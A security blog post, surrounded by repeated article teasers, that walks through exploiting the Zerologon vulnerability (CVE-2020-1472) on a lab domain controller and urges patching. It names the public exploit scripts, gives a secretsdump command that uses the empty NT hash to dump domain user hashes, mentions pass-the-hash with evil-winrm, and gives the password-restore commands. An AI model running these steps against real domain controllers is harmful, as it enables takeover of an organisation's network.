Franco Piergallini Guida How to Trick Apps That Use Deep Learning for Melanoma Detection One of the great achievements of deep learning is image classification using convolutional neural networks. In the article “The Internet of Health” we find a clear example where this...
ElevenPaths Cyber Security Weekly Briefing February 13-19 Privilege escalation vulnerability in Windows Defender SentinelLabs researcher Kasif Dekel has discovered a new vulnerability in Windows Defender that could have been active for more than twelve years. The flaw,...
ElevenPaths ElevenPaths Radio English #1 – Skills of a Cybersecurity Professional In this first episode, our CSA Deepak Daswani discusses what a true cybersecurity professional must have to be valuable to companies.
ElevenPaths Why you are late delivering all your projects and what you can do to address it Anyone who causes harm by forecasting should be treated as either a fool or a liar. Some forecasters cause more damage to society than criminals. —Nassim Taleb, The Black Swan, 2007 In 1957,...
Franco Piergallini Guida How to Trick Apps That Use Deep Learning for Melanoma Detection One of the great achievements of deep learning is image classification using convolutional neural networks. In the article “The Internet of Health” we find a clear example where this...
ElevenPaths Cyber Security Weekly Briefing February 13-19 Privilege escalation vulnerability in Windows Defender SentinelLabs researcher Kasif Dekel has discovered a new vulnerability in Windows Defender that could have been active for more than twelve years. The flaw,...
ElevenPaths CapaciCard: an Elevenpaths’ own physical technology materializing simple identification and authorization Can you imagine to be able to authenticate or authorize a payment just by placing a plastic card on your mobile phone screen? (without circuitry, neither NFC connection nor...
ElevenPaths Cybersecurity Weekly Briefing 6-12 June Enel and Honda Compromised by Snake Ransomware Italian energy corporation Enel and Japanese automotive giant Honda were hit last weekend by ransomware attacks that would have impacted on their IT...
Franco Piergallini Guida How to Trick Apps That Use Deep Learning for Melanoma Detection One of the great achievements of deep learning is image classification using convolutional neural networks. In the article “The Internet of Health” we find a clear example where this...
ElevenPaths Cyber Security Weekly Briefing February 13-19 Privilege escalation vulnerability in Windows Defender SentinelLabs researcher Kasif Dekel has discovered a new vulnerability in Windows Defender that could have been active for more than twelve years. The flaw,...
ElevenPaths Telefónica’s ElevenPaths enhances its global IoT security capabilities with Subex This collaboration provisions the offering of IoT Threat Detection, an incident monitoring and response service for IoT environments.This solution has the capability of learning and modelling the legitimate behaviour...
ElevenPaths Cybersecurity Weekly Briefing November 14-20 Malware distribution campaign supplants the identity of Spanish ministries ESET researchers warn of a malware distribution campaign that is impersonating Spanish ministries to distribute a malicious Android application through links...
Zerologon, Patch or Die!Nacho Brihuega 14 October, 2020 Zerologon. If you are in the IT world and haven’t heard this name yet, you should be worried. Keep reading. Zerologon is possibly the vulnerability of this “special” year and certainly of the last ones. It is one of those vulnerabilities that leaves no one indifferent. First of all, is this vulnerability that critical? Yes, yes and a thousand times yes. Personally, I would say that it is the most critical vulnerability I have known since I entered the cybersecurity world. Let’s start from the beginning: Zerologon (CVE-2020-1472) was discovered in August 2020 by the company Secura, it was directly reported to Microsoft, who assigned a CVSS of 10.0 (out of 10, the highest possible criticality). Subsequently, on September 11, Secura published an advisory and a paper on the vulnerability, which included a tool to detect vulnerable machines. After this, numerous PoCs and tools have been published that allow the vulnerability to be exploited. Why is this vulnerability so critical? Because it allows any user (it doesn’t even require to be in the domain) with connectivity to the DC to reset the password of the admin domain. I encourage you to read the article written by hackplayers on this subject. Zerologon Practical Analysis Once we have seen the theory, let’s get in practice. To test the vulnerability, a DC has been created in a virtual machine, in my case the victim machine has the following IP: 192.168.0.21 First, once you have connectivity to the DC, you can use the Secura script to test whether the DC is vulnerable. However, one of the parameters of the script is the hostname. For this, we can use nma: Or you can use an SMB listing with Crackmapexec And, as you can see by passing that parameter together with the IP, the script gives us as a result if the DC is vulnerable to Zerologon. Once checked that it is in fact vulnerable, making use of this repository it has two scripts: CVE-2020-14-72-exploit.py: allows the exploitation of the vulnerability to be automated.Restorepassword.py allows to reset the password. However, if we run it as it is, we will encounter this problem of impacket: To solve this, we can choose from the following options: Remove impacket and download the latest version (you can check this reference).Use a virtualenv (in this article from S4vitar you can check how to). Now running it again, it works: Likewise, the author of Mimikatz has already updated the tool to take advantage of this vulnerability. In this link you can see the GIF he has prepared with the PoC How can this functionality be used? By taking advantage of this resource we have the command like this: secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr' In our case: Obtaining a list of all the hashes of the domain users You could then either crack the hashes or use the Pass the Hash technique to authenticate yourself in DC. To do this, you can use pth-winexe o evil-winrm with the administrator hash: To reset your password, you will need to use the z“restorepassword” script: python restorepassword.py <DOMAIN><hostname>@<hostname> -target-ip IP -hexpass 54656d706f7………etc or use this functionality. zpython3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH Remember to reset your password if you try it in an intrusion test. And above all… Patch, patch, patch! Recommendations Identify vulnerable machines with the Secura check script and apply the patch: CVE-2020-1472 | Netlogon Elevation of Privilege VulnerabilityCVE-2020-1472 Detail References [Blog] Zerologon: instantly become domain admin by subverting Netlogon cryptography (CVE-2020-1472)CVE-2020-1472 | Netlogon Elevation of Privilege VulnerabilityHacking Windows con Zerologon: Vulnerabilidad crítica que puede comprometer tu Domain Controller #Parchea (Spanish)Zerologon desatado: la vulnerabilidad que permite comprometer cualquier controlador de dominio de Windows fácilmente (Spanish)CCN-CERT AL 09/20 Vulnerabilidad crítica en Windows Server (Spanish) The Future of Digital Signatures to Protect Your Money Lies in Threshold CryptographyThinking About Attacks on WAFs Based on Machine Learning
Franco Piergallini Guida How to Trick Apps That Use Deep Learning for Melanoma Detection One of the great achievements of deep learning is image classification using convolutional neural networks. In the article “The Internet of Health” we find a clear example where this...
ElevenPaths Cyber Security Weekly Briefing February 13-19 Privilege escalation vulnerability in Windows Defender SentinelLabs researcher Kasif Dekel has discovered a new vulnerability in Windows Defender that could have been active for more than twelve years. The flaw,...
Gonzalo Álvarez Marañón Functional Cryptography: The Alternative to Homomorphic Encryption for Performing Calculations on Encrypted Data — Here are the exact coordinates of each operative deployed in the combat zone.— How much?— 100.000.— That is too much.— And a code that displays on screen the...
ElevenPaths WhatsApp, Telegram or Signal, Which One? In the world of smartphones, 2021 began with a piece of news that has left no one indifferent: the update of WhatsApp’s terms and conditions of use. This measure,...
Sergio De Los Santos 26 Reasons Why Chrome Does Not Trust the Spanish CA Camerfirma From the imminent version 90, Chrome will show a certificate error when a user tries to access any website with a certificate signed by Camerfirma. Perhaps it is not...
ElevenPaths Cyber Security Weekly Briefing February 6-12 Attempted contamination of drinking water through a cyber-attack An unidentified threat actor reportedly accessed computer systems at the City of Oldsmar’s water treatment plant in Florida, US, and altered the...